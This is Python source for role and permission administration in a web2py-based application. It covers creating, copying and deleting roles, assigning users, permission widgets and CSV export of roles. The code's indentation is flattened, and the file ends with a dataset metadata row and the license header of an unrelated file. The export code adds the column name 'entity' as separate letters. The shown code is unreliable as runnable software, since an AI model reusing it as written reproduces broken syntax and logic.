data = {"role": rolename}
role_id = auth.s3_create_role(rolename,
description = formvars.description,
uid = uid,
)
if role_id:
# Update permissions
permissions = formvars.permissions
if permissions:
self.update_permissions(role_id, permissions)
if not role:
message = T("Role %(role)s created") % data
else:
message = T("Role %(role)s updated") % data
else:
if not role:
message = T("Failed to create role %(role)s") % data
else:
message = T("Failed to update role %(role)s") % data
return role_id, message
# -------------------------------------------------------------------------
@staticmethod
def update_permissions(role_id, rules):
"""
Update the permission rules for a role
@param role_id: the role record ID (auth_group.id)
@param rules: the rules as JSON string
"""
table = current.auth.permission.table
if table:
db = current.db
rules = json.loads(rules)
for rule in rules:
rule_id = rule[0]
deleted = rule[7]
if rule_id is None:
continue
if not any(rule[i] for i in (1, 2, 3)):
continue
if rule_id and deleted:
db(table.id == rule_id).update(deleted=True)
else:
entity = rule[6]
if entity == "any":
unrestricted = True
entity = None
else:
unrestricted = False
try:
entity = long(entity) if entity else None
except (ValueError, TypeError):
entity = None
data = {"group_id": role_id,
"controller": rule[1],
"function": rule[2],
"tablename": rule[3],
"uacl": rule[4],
"oacl": rule[5],
"entity": entity,
"unrestricted": unrestricted,
}
if rule_id:
# Update the rule
db(table.id == rule_id).update(**data)
else:
# Add the rule
table.insert(**data)
# -------------------------------------------------------------------------
@staticmethod
def copy_role(r, **attr):
"""
Duplicate an existing role
NB this function must be restricted to ADMINs (in apply_method)
"""
# CSRF Protection
key = current.session["_formkey[admin/rolelist]"]
if not key or r.post_vars.get("_formkey") != key:
r.error(403, current.ERROR.NOT_PERMITTED)
elif r.http != "POST":
r.error(405, current.ERROR.BAD_METHOD)
db = current.db
role = r.record
if not role:
r.error(400, current.ERROR.BAD_RECORD)
# Find a suitable uuid and name
table = r.table
query = ((table.uuid.like("%s%%" % role.uuid)) | \
(table.role.like("%s%%" % role.role)))
rows = db(query).select(table.uuid,
table.role,
)
uids = set(row.uuid for row in rows)
names = set(row.role for row in rows)
uid = name = None
for i in range(2, 1000):
if not uid:
uid = "%s%s" % (role.uuid, i)
if uid in uids:
uid = None
if not name:
name = "%s-%s" % (role.role, i)
if name in names:
name = None
if uid and name:
break
if not uid:
uid = str(uuid.uuid4())
if not name:
name = str(uuid.uuid4())
# Create the new role
role_id = table.insert(uuid = uid,
role = name,
)
# Copy permissions
ptable = current.auth.permission.table
if ptable:
query = (ptable.group_id == role.id) & \
(ptable.deleted == False)
rules = db(query).select(ptable.controller,
ptable.function,
ptable.tablename,
ptable.record,
ptable.oacl,
ptable.uacl,
ptable.entity,
ptable.unrestricted,
)
for rule in rules:
ptable.insert(group_id = role_id,
controller = rule.controller,
function = rule.function,
tablename = rule.tablename,
record = rule.record,
oacl = rule.oacl,
uacl = rule.uacl,
entity = rule.entity,
unrestricted = rule.unrestricted,
)
message = current.T("New Role %(role)s created") % {"role": name}
return current.xml.json_message(message=message)
# -------------------------------------------------------------------------
@staticmethod
def delete_role(r, **attr):
"""
Delete a role
NB this function must be restricted to ADMINs (in apply_method)
"""
# CSRF Protection
key = current.session["_formkey[admin/rolelist]"]
if not key or r.post_vars.get("_formkey") != key:
r.error(403, current.ERROR.NOT_PERMITTED)
elif r.http not in ("POST", "DELETE"):
r.error(405, current.ERROR.BAD_METHOD)
role = r.record
if not role:
r.error(400, current.ERROR.BAD_RECORD)
if role.protected or role.system:
r.error(403, current.ERROR.NOT_PERMITTED)
auth = current.auth
auth.s3_delete_role(role.id)
auth.s3_set_roles()
message = current.T("Role %(role)s deleted") % {"role": role.role}
return current.xml.json_message(message=message)
# -------------------------------------------------------------------------
def assign_roles(self, r, **attr):
"""
Assign/unassign roles to a user
NB this function is accessible for non-ADMINs (e.g. ORG_ADMIN)
"""
auth = current.auth
# Require a primary record
if not r.record:
            r.error(400, current.ERROR.BAD_RECORD)
# Require permission to create or delete group memberships
mtable = auth.settings.table_membership
permitted = auth.s3_has_permission
if not permitted("create", mtable) and not permitted("delete", mtable):
r.unauthorised()
# Require that the target user record belongs to a managed organisation
pe_ids = auth.get_managed_orgs()
if not pe_ids:
r.unauthorised()
elif pe_ids is not True:
otable = current.s3db.org_organisation
utable = auth.settings.table_user
query = (utable.id == r.id) & \
(otable.id == utable.organisation_id) & \
(otable.pe_id.belongs(pe_ids))
row = current.db(query).select(utable.id, limitby=(0, 1)).first()
if not row:
r.unauthorised()
# Which roles can the current user manage for this user?
managed_roles = self.get_managed_roles(r.id)
output = {}
if r.http == "GET":
T = current.T
# Page Title
userfield = auth.settings.login_userfield
user_name = r.record[userfield]
output["title"] = "%s: %s" % (T("Roles of User"), user_name)
# Should we use realms?
use_realms = auth.permission.entity_realm
if use_realms:
realm_types, realms = self.get_managed_realms()
else:
realm_types, realms = None, None
# The Ajax URL for role updates
ajax_url = r.url(id="[id]", representation="json")
# The form field
field = mtable.user_id
field.readable = field.writable = True
field.widget = S3RolesWidget(mode = "roles",
items = managed_roles,
use_realms = use_realms,
realm_types = realm_types,
realms = realms,
ajax_url = ajax_url,
)
# Render form
s3 = current.response.s3
tablename = str(mtable)
form = SQLFORM.factory(field,
record = {"id": None, "user_id": r.id},
showid = False,
labels = {field.name: ""},
formstyle = s3.crud.formstyle,
table_name = tablename,
upload = s3.download_url,
#readonly = readonly,
separator = "",
submit_button = False,
buttons = [],
)
form.add_class("rm-form")
output["form"] = form
# Show a back-button since OrgAdmins have no other obvious
# way to return to the list (no left menu)
crud_button = S3CRUD.crud_button
output["list_btn"] = crud_button(T("Back to User List"),
icon = "return",
_href = r.url(id="", method=""),
)
# View
response = current.response
response.view = "admin/role_form.html"
elif r.http == "POST":
if r.representation == "json":
# Read+parse body JSON
s = r.body
s.seek(0)
try:
options = json.load(s)
except JSONERRORS:
options = None
if not isinstance(options, dict):
r.error(400, "Invalid request options")
user_id = r.record.id
added = options.get("add")
removed = options.get("remove")
# Validate
if added:
for group_id, pe_id in added:
role = managed_roles.get(group_id)
if not role or role.get("a") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
if removed:
for group_id, pe_id in removed:
role = managed_roles.get(group_id)
if not role or role.get("r") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
# Update role assignments
if added:
add_role = auth.s3_assign_role
for group_id, pe_id in added:
add_role(user_id, group_id, for_pe=pe_id)
if removed:
remove_role = auth.s3_withdraw_role
for group_id, pe_id in removed:
remove_role(user_id, group_id, for_pe=pe_id)
output = current.xml.json_message(options=options)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
def assign_users(self, r, **attr):
"""
Assign/unassign users to a role
NB this function could be accessible for non-ADMINs (e.g. ORG_ADMIN)
"""
auth = current.auth
# Require a primary record
role = r.record
if not role:
            r.error(400, current.ERROR.BAD_RECORD)
# Require permission to create or delete group memberships
mtable = auth.settings.table_membership
permitted = auth.s3_has_permission
if not permitted("create", mtable) and not permitted("delete", mtable):
r.unauthorised()
# Require that the target role belongs to managed roles
managed_roles = self.get_managed_roles(None)
if role.id not in managed_roles:
r.unauthorised()
s3 = current.response.s3
# Which users can the current user manage?
managed_users = self.get_managed_users(role.id)
# Special rules for system roles
sr = auth.get_system_roles()
unrestrictable = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS)
unassignable = (sr.AUTHENTICATED, sr.ANONYMOUS)
output = {}
if r.http == "GET":
T = current.T
# Page Title
output["title"] = "%s: %s" % (T("Users with Role"), role.role)
# Should we use realms?
use_realms = auth.permission.entity_realm and \
role.id not in unrestrictable
if use_realms:
realm_types, realms = self.get_managed_realms()
else:
realm_types, realms = None, None
# The Ajax URL for role updates
ajax_url = r.url(id="[id]", representation="json")
# The form field
field = mtable.group_id
field.readable = field.writable = True
field.widget = S3RolesWidget(mode="users",
items = managed_users,
use_realms = use_realms,
realm_types = realm_types,
realms = realms,
ajax_url = ajax_url,
)
# Render form
tablename = str(mtable)
form = SQLFORM.factory(field,
record = {"id": None, "group_id": role.id},
showid = False,
labels = {field.name: ""},
formstyle = s3.crud.formstyle,
table_name = tablename,
upload = s3.download_url,
#readonly = readonly,
separator = "",
submit_button = False,
buttons = [],
)
form.add_class("rm-form")
output["form"] = form
# Default RHeader and View
if "rheader" not in attr:
return_btn = S3CRUD.crud_button("Back to Roles List",
icon = "return",
_href=r.url(id="", method=""),
)
output["rheader"] = DIV(return_btn,
_class="rheader",
)
response = current.response
response.view = "admin/role_form.html"
elif r.http == "POST":
if r.representation == "json":
# Process Ajax-request from S3RolesWidget
# Read+parse body JSON
s = r.body
s.seek(0)
try:
options = json.load(s)
except JSONERRORS:
options = None
if not isinstance(options, dict):
r.error(400, "Invalid request options")
added = options.get("add")
removed = options.get("remove")
# Validate
group_id = role.id
if group_id in unassignable:
r.error(403, current.ERROR.NOT_PERMITTED)
if added:
for user_id, pe_id in added:
user = managed_users.get(user_id)
if not user or user.get("a") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
if removed:
for user_id, pe_id in removed:
user = managed_users.get(user_id)
if not user or user.get("r") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
# Update role assignments
if added:
add_role = auth.s3_assign_role
for user_id, pe_id in added:
add_role(user_id, group_id, for_pe=pe_id)
if removed:
remove_role = auth.s3_withdraw_role
for user_id, pe_id in removed:
remove_role(user_id, group_id, for_pe=pe_id)
output = current.xml.json_message(options=options)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
@staticmethod
def get_managed_users(role_id):
"""
Get a dict of users the current user can assign to roles
@param role_id: the target role ID
@returns: a dict {user_id: {l:label,
t:title,
a:assignable,
r:removable,
u:unrestrictable,
}, ...}
NB a, r and u attributes only added if non-default
"""
auth = current.auth
auth_settings = auth.settings
sr = auth.get_system_roles()
admin_role = role_id == sr.ADMIN
unassignable = role_id in (sr.AUTHENTICATED, sr.ANONYMOUS)
unrestrictable = role_id in (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS)
current_user = auth.user.id if auth.user else None
users = {}
pe_ids = auth.get_managed_orgs()
if pe_ids:
utable = auth_settings.table_user
query = (utable.deleted == False)
if pe_ids is not True:
otable = current.s3db.org_organisation
query &= (otable.id == utable.organisation_id) & \
(otable.pe_id.belongs(pe_ids))
userfield = auth_settings.login_userfield
rows = current.db(query).select(utable.id,
utable.first_name,
utable.last_name,
utable[userfield],
)
for row in rows:
user_id = row.id
user = {"l": row[userfield],
"t": "%s %s" % (row.first_name,
row.last_name,
),
}
if unrestrictable:
user["u"] = True
if admin_role and user_id == current_user:
# ADMINs cannot remove their own ADMIN role
user["r"] = False
if unassignable:
user["a"] = user["r"] = False
users[user_id] = user
return users
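        # Illustrative return value (hypothetical users):
        #   {23: {"l": "jdoe@example.com", "t": "Jane Doe"},
        #    42: {"l": "admin@example.com", "t": "Ada Admin", "r": False}}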
# -------------------------------------------------------------------------
@staticmethod
def get_managed_roles(user_id):
"""
Get a dict of roles the current user can manage
@returns: a dict {role_id: {l:label,
a:assignable,
r:removable,
u:unrestrictable,
}, ...},
NB a, r and u attributes only added if non-default
"""
auth = current.auth
sr = auth.get_system_roles()
AUTO = (sr.AUTHENTICATED, sr.ANONYMOUS)
ADMINS = (sr.ADMIN, sr.ORG_ADMIN, sr.ORG_GROUP_ADMIN)
UNRESTRICTABLE = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS)
table = auth.settings.table_group
query = (table.hidden == False) & \
(table.deleted == False)
rows = current.db(query).select(table.id,
table.uuid,
table.role,
)
has_role = auth.s3_has_role
roles = {}
for row in rows:
role = {"l": row.role or row.uuid}
role_id = row.id
if role_id in ADMINS:
assignable = has_role(role_id)
else:
assignable = role_id not in AUTO
if role_id == sr.ADMIN and auth.user.id == user_id:
removable = False
else:
removable = assignable
if not assignable:
role["a"] = False
if not removable:
role["r"] = False
if role_id in UNRESTRICTABLE:
role["u"] = True
roles[role_id] = role
return roles
# -------------------------------------------------------------------------
@staticmethod
def get_managed_realms():
"""
Get a dict of realms managed by the current user
@returns: tuple (realm_types, realms):
- realm_types = [(instance_type, label), ...]
- realms = {pe_id: {l:label, t:type}, ...}
"""
T = current.T
t_ = lambda v: s3_str(T(v))
realm_types = [(None, t_("Multiple"))]
realms = {None: {"l": t_("Default Realm"), "t": None},
}
# Look up the realms managed by the current user
pe_ids = []
auth = current.auth
sr = auth.get_system_roles()
has_role = auth.s3_has_role
is_admin = has_role(sr.ADMIN)
if is_admin:
# Only ADMIN can assign roles site-wide
realms[0] = {"l": t_("All Entities"), "t": None}
else:
if has_role(sr.ORG_GROUP_ADMIN):
role_realms = auth.user.realms[sr.ORG_GROUP_ADMIN]
if role_realms:
pe_ids.extend(role_realms)
if has_role(sr.ORG_ADMIN):
role_realms = auth.user.realms[sr.ORG_ADMIN]
if role_realms:
pe_ids.extend(role_realms)
# Get entities and types
s3db = current.s3db
types = current.deployment_settings.get_auth_realm_entity_types()
entities = s3db.pr_get_entities(pe_ids = pe_ids,
types = types,
group = True,
show_instance_type = False,
)
# Add representations for entities and types
instance_type_nice = s3db.pr_pentity.instance_type.represent
for instance_type in types:
entity_group = entities.get(instance_type)
if not entity_group:
continue
realm_types.append((instance_type,
s3_str(instance_type_nice(instance_type)),
))
for pe_id, name in entity_group.items():
realms[pe_id] = {"l": s3_str(name), "t": instance_type}
return realm_types, realms
# -------------------------------------------------------------------------
def import_roles(self, r, **attr):
"""
Interactive import of roles (auth_roles.csv format)
NB this function must be restricted to ADMINs (in apply_method)
"""
# TODO implement roles importer
T = current.T
output = {}
# Title
output["title"] = T("Import Roles")
# View
response = current.response
response.view = "admin/import_roles.html"
return output
# if GET:
# show an import form
# elif POST:
# import the submitted file using Bulk-importer
# -------------------------------------------------------------------------
@staticmethod
def export_roles(r, **attr):
"""
Export of roles (auth_roles.csv format)
NB this function must be restricted to ADMINs (in apply_method)
"""
output = S3RolesExport(r.resource).as_csv()
# Response headers
from gluon.contenttype import contenttype
filename = "auth_roles.csv"
disposition = "attachment; filename=\"%s\"" % filename
response = current.response
response.headers["Content-Type"] = contenttype(".csv")
response.headers["Content-disposition"] = disposition
return output.read()
# =============================================================================
class S3PermissionWidget(object):
"""
Form widget to modify permissions of a role
"""
def __init__(self, role_id=None):
"""
Constructor
"""
sr = current.auth.get_system_roles()
if role_id == sr.ANONYMOUS:
default_roles = ()
elif role_id == sr.AUTHENTICATED:
default_roles = (sr.ANONYMOUS,)
else:
default_roles = (sr.ANONYMOUS, sr.AUTHENTICATED)
self.default_roles = default_roles
# -------------------------------------------------------------------------
def __call__(self, field, value, **attributes):
"""
Form builder entry point
@param field: the Field
@param value: the current (or default) value of the field
@param attributes: HTML attributes for the widget
"""
T = current.T
# Widget ID
widget_id = attributes.get("_id") or str(field).replace(".", "_")
# Field name
name = attributes.get("_name") or field.name
# Page access rules tab+pane
prules_id = "%s-prules" % widget_id
prules_tab = LI(A(T("Page Access"),
_href = "#" + prules_id,
)
)
prules_pane = DIV(_id = prules_id,
_class = "rm-page-rules",
)
# Table access rules tab+page
rules = current.auth.permission
use_tacls = rules.use_tacls
if use_tacls:
trules_id = "%s-trules" % widget_id
trules_tab = LI(A(T("Table Access"),
_href = "#" + trules_id,
),
)
trules_pane = DIV(_id = trules_id,
_class = "rm-table-rules",
)
else:
trules_pane = ""
trules_tab = ""
# Construct the widget
widget = DIV(INPUT(_type = "hidden",
_name = name,
_value = value,
_id = widget_id + "-input",
),
DIV(UL(trules_tab,
prules_tab,
),
trules_pane,
prules_pane,
_class = "rm-rules hide"
),
_id = widget_id,
)
# Module header icons
rtl = current.response.s3.rtl
icons = {"expanded": "fa fa-caret-down",
"collapsed": "fa fa-caret-left" if rtl else "fa fa-caret-right",
}
# Client-side widget options
widget_opts = {"fRules": rules.use_facls,
"tRules": use_tacls,
"useRealms": rules.entity_realm,
"permissions": self.get_permissions(),
"defaultPermissions": self.get_default_permissions(),
"modules": self.get_active_modules(),
"icons": icons,
}
if use_tacls:
widget_opts["models"] = self.get_active_models()
# Localized strings for client-side widget
i18n = {"rm_Add": T("Add"),
"rm_AddRule": T("Add Rule"),
"rm_AllEntities": T("All Entities"),
"rm_AllRecords": T("All Records"),
"rm_AssignedEntities": T("Assigned Entities"),
"rm_Cancel": T("Cancel"),
"rm_CollapseAll": T("Collapse All"),
"rm_ConfirmDeleteRule": T("Do you want to delete this rule?"),
"rm_Default": T("default"),
"rm_DeleteRule": T("Delete"),
"rm_ExpandAll": T("Expand All"),
"rm_NoAccess": T("No access"),
"rm_NoRestrictions": T("No restrictions"),
"rm_Others": T("Others"),
"rm_OwnedRecords": T("Owned Records"),
"rm_Page": T("Page"),
"rm_RestrictedTables": T("Restricted Tables"),
"rm_Scope": T("Scope"),
"rm_SystemTables": T("System Tables"),
"rm_Table": T("Table"),
"rm_UnrestrictedTables": T("Unrestricted Tables"),
}
# Inject the client-side script
self.inject_script(widget_id, widget_opts, i18n)
return widget
# -------------------------------------------------------------------------
@staticmethod
def get_active_modules():
"""
Get a JSON-serializable dict of active modules
@returns: a dict {prefix: (name_nice, restricted)}
"""
# Modules where access rules do not apply (or are hard-coded)
exclude = ("appadmin", "errors")
# Active modules
modules = current.deployment_settings.modules
        active = {k: (s3_str(modules[k].name_nice), modules[k].restricted)
                  for k in modules if k not in exclude
                  }
# Special controllers for dynamic models
if current.auth.permission.use_facls:
active["default/dt"] = (s3_str(current.T("Dynamic Models")), True)
return active
# -------------------------------------------------------------------------
def get_active_models(self):
"""
Get a JSON-serializable dict of active data models
@returns: a dict {prefix: {tablename: restricted}}
"""
# Get all table names
db_tables = current.cache.ram("permission_widget_all_tables",
self.get_db_tables,
time_expire = 14400,
)
# Count the number of restricting roles per table
# @see: S3Permission.table_restricted()
rtable = current.auth.permission.table
query = (rtable.tablename != None) & \
(rtable.controller == None) & \
(rtable.function == None) & \
(rtable.deleted == False)
numroles = rtable.group_id.count()
tablename = rtable.tablename
rows = current.db(query).select(tablename,
numroles,
groupby = tablename,
)
restrictions = {row[tablename]: row[numroles] for row in rows}
# Sort tablenames after module and mark number of restrictions
models = {}
for tablename in db_tables:
prefix = tablename.split("_", 1)[0]
if prefix in ("auth", "sync", "s3", "scheduler"):
prefix = "_system"
if prefix not in models:
models[prefix] = {}
models[prefix][tablename] = restrictions.get(tablename, 0)
return models
# -------------------------------------------------------------------------
@staticmethod
def get_db_tables():
"""
Return all table names in the database; in separate function
to allow caching because it requires to load all models once
@returns: db.tables
"""
db = current.db
s3db = current.s3db
# Load all static models
s3db.load_all_models()
# Load all dynamic tables (TODO: how does this make sense?)
#ttable = s3db.s3_table
#rows = db(ttable.deleted != True).select(ttable.name)
#for row in rows:
# s3db.table(row.name)
return db.tables
# -------------------------------------------------------------------------
@staticmethod
def get_permissions():
"""
Get a JSON-serializable list of permissions
@returns: an ordered list of dicts:
[{l: label,
b: bit,
o: relevant for owned records,
},
...
]
"""
permission = current.auth.permission
opts = permission.PERMISSION_OPTS
skip = 0x0000
# Hide approval-related permissions if record approval is disabled
if not current.deployment_settings.get_auth_record_approval():
skip |= permission.REVIEW | permission.APPROVE
output = []
for bit, label in opts.items():
if bit & skip:
continue
output.append({"l": s3_str(label),
"b": bit,
"o": bit != permission.CREATE,
})
return output
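        # Illustrative result (labels and bit values depend on the
        # deployment's PERMISSION_OPTS):
        #   [{"l": "Create", "b": 1, "o": False},
        #    {"l": "Read", "b": 2, "o": True}, ...]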
# -------------------------------------------------------------------------
def get_default_permissions(self):
"""
Get default permissions, i.e. those granted by roles the user
has by default
            @returns: a dict {target: (uACL, oACL)}, where target is either
                      a tablename or a "controller/function" string
"""
permissions = current.auth.permission
table = permissions.table
default_roles = self.default_roles
default_permissions = {}
if table and default_roles:
query = (table.group_id.belongs(default_roles))
if not permissions.use_facls:
query &= (table.function == None)
if not permissions.use_tacls:
query &= (table.tablename == None)
query &= (table.deleted == False)
rows = current.db(query).select(table.controller,
table.function,
table.tablename,
table.uacl,
table.oacl,
)
for row in rows:
target = row.tablename
if not target:
c = row.controller
if c:
target = "%s/%s" % (c, row.function or "*")
else:
continue
rules = default_permissions.get(target)
if rules:
default_permissions[target] = (rules[0] | row.uacl,
rules[1] | row.oacl,
)
else:
default_permissions[target] = (row.uacl, row.oacl)
return default_permissions
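    # Illustrative merge (bit values hypothetical): if two default roles
    # both have rules for the same target, e.g. (uacl=0x1, oacl=0x3) and
    # (uacl=0x2, oacl=0x4), the stored tuple is the bitwise OR of both,
    # i.e. (0x3, 0x7).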
# -------------------------------------------------------------------------
def inject_script(self, widget_id, options, i18n):
"""
Inject the necessary JavaScript for the widget
@param widget_id: the widget ID
(=element ID of the person_id field)
@param options: JSON-serializable dict of widget options
@param i18n: translations of screen messages rendered by
the client-side script,
a dict {messageKey: translation}
"""
s3 = current.response.s3
# Static script
if s3.debug:
script = "/%s/static/scripts/S3/s3.ui.permissions.js" % \
current.request.application
else:
script = "/%s/static/scripts/S3/s3.ui.permissions.min.js" % \
current.request.application
scripts = s3.scripts
if script not in scripts:
scripts.append(script)
self.inject_i18n(i18n)
# Widget options
opts = {}
if options:
opts.update(options)
# Widget instantiation
script = '''$('#%(widget_id)s').permissionEdit(%(options)s)''' % \
{"widget_id": widget_id,
"options": json.dumps(opts, separators=SEPARATORS),
}
jquery_ready = s3.jquery_ready
if script not in jquery_ready:
jquery_ready.append(script)
# -------------------------------------------------------------------------
@staticmethod
def inject_i18n(labels):
"""
Inject translations for screen messages rendered by the
client-side script
@param labels: dict of translations {messageKey: translation}
"""
strings = ['''i18n.%s="%s"''' % (k, s3_str(v))
for k, v in labels.items()]
current.response.s3.js_global.append("\n".join(strings))
# =============================================================================
class S3RolesWidget(object):
"""
Form widget to assign roles to users
"""
def __init__(self,
mode="roles",
items=None,
use_realms=False,
realm_types=None,
realms=None,
ajax_url=None,
):
"""
Constructor
@param mode: what to assign ("roles"|"users")
@param items: the assignable items (roles or users), dict,
structure see get_managed_roles/get_managed_users
@param use_realms: boolean, whether to use realms
@param realm_types: the realm types and their labels, tuple,
format see get_managed_realms
@param realms: the realms, dict, structure see get_managed_realms
@param ajax_url: the URL for Ajax modification of assignments
"""
self.mode = mode
self.items = items
self.use_realms = use_realms
self.realm_types = realm_types
self.realms = realms
self.ajax_url = ajax_url
# -------------------------------------------------------------------------
def __call__(self, field, value, **attributes):
"""
Form builder entry point
@param field: the Field
@param value: the current (or default) value of the field
@param attributes: HTML attributes for the widget
"""
T = current.T
# Widget ID
widget_id = attributes.get("_id") or str(field).replace(".", "_")
# Field name
name = attributes.get("_name") or field.name
# Extract the current assignments
if value:
assignments = self.get_current_assignments(value)
else:
assignments = []
# Construct the widget
widget = DIV(INPUT(_type = "hidden",
_name = name,
_value = value,
_id = widget_id + "-id",
),
INPUT(_type = "hidden",
_name = "assigned",
_value = json.dumps(assignments, separators=SEPARATORS),
_id = widget_id + "-data",
),
_id = widget_id,
_class = "rm-assign-widget",
)
# Client-side widget options
widget_opts = {"mode": self.mode,
"ajaxURL": self.ajax_url,
"items": self.items,
"useRealms": self.use_realms,
"realms": self.realms,
"realmTypes": self.realm_types,
}
# Localized strings for client-side widget
if self.mode == "roles":
CONFIRM = T("Do you want to remove the %(role)s role?")
else:
CONFIRM = T("Do you want to remove %(user)s from this role?")
i18n = {"rm_Add": T("Add"),
"rm_Cancel": T("Cancel"),
"rm_ConfirmDeleteAssignment": CONFIRM,
"rm_Delete": T("Delete"),
"rm_DeletionFailed": T("Deletion Failed"),
"rm_ForEntity": T("For Entity"),
"rm_Roles": T("Roles"),
"rm_SubmissionFailed": T("Submission Failed"),
"rm_Users": T("Users"),
}
# Inject the client-side script
self.inject_script(widget_id, widget_opts, i18n)
return widget
# -------------------------------------------------------------------------
def get_current_assignments(self, record_id):
"""
Get the current assignments for the user/role
@param record_id: the user or role ID
@returns: a list of tuples (roleID|userID, realmID)
"""
auth = current.auth
table = auth.settings.table_membership
if self.mode == "roles":
query = (table.user_id == record_id) & \
(table.group_id.belongs(set(self.items.keys())))
field = table.group_id
else:
query = (table.group_id == record_id) & \
(table.user_id.belongs(set(self.items.keys())))
field = table.user_id
use_realms = self.use_realms
if use_realms and \
not auth.s3_has_role(auth.get_system_roles().ADMIN):
managed_realms = set(self.realms.keys())
none = None in managed_realms
managed_realms.discard(None)
q = (table.pe_id.belongs(managed_realms)) if managed_realms else None
if none:
n = (table.pe_id == None)
q = q | n if q else n
if q:
query &= q
query &= (table.deleted == False)
rows = current.db(query).select(field, table.pe_id)
assignments = set()
for row in rows:
pe_id = row.pe_id if use_realms else None
assignments.add((row[field], pe_id))
return list(assignments)
# -------------------------------------------------------------------------
def inject_script(self, widget_id, options, i18n):
"""
Inject the necessary JavaScript for the widget
@param widget_id: the widget ID
(=element ID of the person_id field)
@param options: JSON-serializable dict of widget options
@param i18n: translations of screen messages rendered by
the client-side script,
a dict {messageKey: translation}
"""
s3 = current.response.s3
# Static script
if s3.debug:
script = "/%s/static/scripts/S3/s3.ui.roles.js" % \
current.request.application
else:
script = "/%s/static/scripts/S3/s3.ui.roles.min.js" % \
current.request.application
scripts = s3.scripts
if script not in scripts:
scripts.append(script)
self.inject_i18n(i18n)
# Widget options
opts = {}
if options:
opts.update(options)
# Widget instantiation
script = '''$('#%(widget_id)s').roleManager(%(options)s)''' % \
{"widget_id": widget_id,
"options": json.dumps(opts, separators=SEPARATORS),
}
jquery_ready = s3.jquery_ready
if script not in jquery_ready:
jquery_ready.append(script)
# -------------------------------------------------------------------------
@staticmethod
def inject_i18n(labels):
"""
Inject translations for screen messages rendered by the
client-side script
@param labels: dict of translations {messageKey: translation}
"""
strings = ['''i18n.%s="%s"''' % (k, s3_str(v))
for k, v in labels.items()]
current.response.s3.js_global.append("\n".join(strings))
# =============================================================================
class S3RolesExport(object):
"""
Roles Exporter
"""
def __init__(self, resource):
"""
Constructor
@param resource: the role resource (auth_group) with REST
filters; or None to export all groups
"""
db = current.db
auth = current.auth
# Optional columns
self.col_hidden = False
self.col_protected = False
self.col_entity = False
# Look up the roles
gtable = auth.settings.table_group
fields = ("id",
"uuid",
"role",
"description",
"hidden",
"protected",
"system",
)
if resource and resource.tablename == str(gtable):
roles = resource.select(fields, as_rows=True)
else:
query = (gtable.deleted == False)
roles = db(query).select(*fields)
# Generate roles dict
role_dicts = {}
for role in roles:
role_dict = {"uid": role.uuid,
"role": role.role,
"description": role.description,
}
if role.hidden:
self.col_hidden = True
role_dict["hidden"] = "true"
if role.protected and not role.system:
self.col_protected = True
role_dict["protected"] = "true"
role_dicts[role.id] = role_dict
self.roles = role_dicts
# Look up all rules, ordered by UID, controller, function, table
rtable = auth.permission.table
query = (rtable.group_id.belongs(set(role_dicts.keys()))) & \
(rtable.deleted == False)
rules = db(query).select(rtable.id,
rtable.group_id,
rtable.controller,
rtable.function,
rtable.tablename,
rtable.uacl,
rtable.oacl,
rtable.entity,
)
self.rules = rules
# Look up all org entities
entities = set()
for rule in rules:
entity = rule.entity
if entity is not None:
self.col_entity = True
entities.add(entity)
otable = current.s3db.org_organisation
query = (otable.pe_id.belongs(entities)) & \
(otable.deleted == False)
self.orgs = db(query).select(otable.pe_id,
otable.name,
).as_dict(key="pe_id")
# -------------------------------------------------------------------------
def as_csv(self):
"""
Export the current roles and permissions as CSV,
suitable for prepop (see S3BulkImporter.import_role)
@returns: a StringIO containing the CSV
"""
import csv
# Optional columns
col_protected = self.col_protected
col_hidden = self.col_hidden
col_entity = self.col_entity
# Role fields
fieldnames = ["uid", "role", "description"]
if col_hidden:
fieldnames.append("hidden")
if col_protected:
fieldnames.append("protected")
# Rule fields
fieldnames.extend(["controller", "function", "table", "uacl", "oacl"])
if col_entity:
fieldnames.extend("entity")
# Helper to get the role UID for a rule
role_dicts = self.roles
def get_uid(group_id):
role_dict = role_dicts.get(group_id)
return role_dict.get("uid") if role_dict else None
# Sort the rules
rules = sorted(self.rules,
key = lambda rule: (get_uid(rule.group_id),
rule.controller or "zzzzzz",
rule.function or "",
rule.tablename or "",
))
# Create the CSV
f = StringIO()
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
# Write the rules to the CSV
orgs = self.orgs
encode_permissions = self.encode_permissions
for rule in rules:
role_dict = role_dicts.get(rule.group_id)
if not role_dict:
continue
rule_dict = {}
# The entity column (optional)
if col_entity:
entity = rule.entity
if entity is not None:
if entity == 0:
rule_dict["entity"] = "any"
else:
org = orgs.get(entity)
if org:
rule_dict["entity"] = org
else:
continue
# The target columns (controller, function, table)
if rule.tablename:
rule_dict["table"] = rule.tablename
else:
if rule.controller:
rule_dict["controller"] = rule.controller
if rule.function:
rule_dict["function"] = rule.function
# The permission columns (uacl, oacl)
uacl = encode_permissions(rule.uacl, explicit_none=True)
if uacl:
rule_dict["uacl"] = uacl
oacl = encode_permissions(rule.oacl & ~(rule.uacl))
if oacl:
rule_dict["oacl"] = oacl
# Add role columns
rule_dict.update(role_dict)
# Write the rule
writer.writerow(rule_dict)
f.seek(0)
return f
# -------------------------------------------------------------------------
@staticmethod
def encode_permissions(permissions, explicit_none=False):
"""
Encodes a permission bitmap as string, using the permission
labels from S3Permission.PERMISSION_OPTS
@param permissions: the permission bitmap
@param explicit_none: return "NONE" if no permission bit set
(otherwise returns None)
"""
if not permissions:
if explicit_none:
return "NONE"
else:
return None
opts = current.auth.permission.PERMISSION_OPTS
labels = []
for bit in opts:
if permissions & bit:
labels.append(opts[bit])
return "|".join(labels)
# END =========================================================================
| mit | 2,148,195,638,398,239,000 | 34.396073 | 119 | 0.441798 | false |
berrange/gerrymander | gerrymander/operations.py | 1 | 5420 | #
# Copyright (C) 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
